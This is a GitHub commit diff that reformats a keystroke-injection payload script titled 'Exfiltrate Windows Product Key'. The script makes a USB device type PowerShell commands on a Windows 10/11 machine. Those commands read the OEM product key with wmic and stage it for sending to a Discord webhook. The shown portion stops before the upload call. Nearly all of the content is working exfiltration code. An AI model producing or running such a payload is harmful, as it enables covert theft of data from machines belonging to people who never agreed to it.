Update payload.txt

pull/673/head
Aleff 2024-06-09 12:04:01 +02:00 committed by GitHub
parent 636c79566b
commit 2a47594e3a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 10 additions and 10 deletions

View File

@ -1,11 +1,11 @@
* REM ###################################################
* REM # |
* REM # Title : Exfiltrate Windows Product Key |
* REM # Author : Aleff |
* REM # Version : 1.0 |
* REM # Category : Exfiltration |
* REM # Target : Windows 10-11 |
* REM # |
* REM # #
* REM # Title : Exfiltrate Windows Product Key #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : Exfiltration #
* REM # Target : Windows 10-11 #
* REM # #
* REM ###################################################
ATTACKMODE HID
@ -20,10 +20,10 @@ QUACK DELAY 1000
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 2000
QUACK STRING $hookUrl = "$DISCORD-WEBHOOK"
QUACK STRING $hookUrl = \"$DISCORD-WEBHOOK\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $exfiltration = @"
QUACK STRING $exfiltration = @\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $(wmic path softwarelicensingservice get OA3xOriginalProductKey)
@ -32,7 +32,7 @@ QUACK DELAY 500
QUACK STRING $(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription)
QUACK ENTER
QUACK DELAY 500
QUACK STRING "@
QUACK STRING \"@
QUACK ENTER
QUACK DELAY 500
QUACK STRING $payload = [PSCustomObject]@{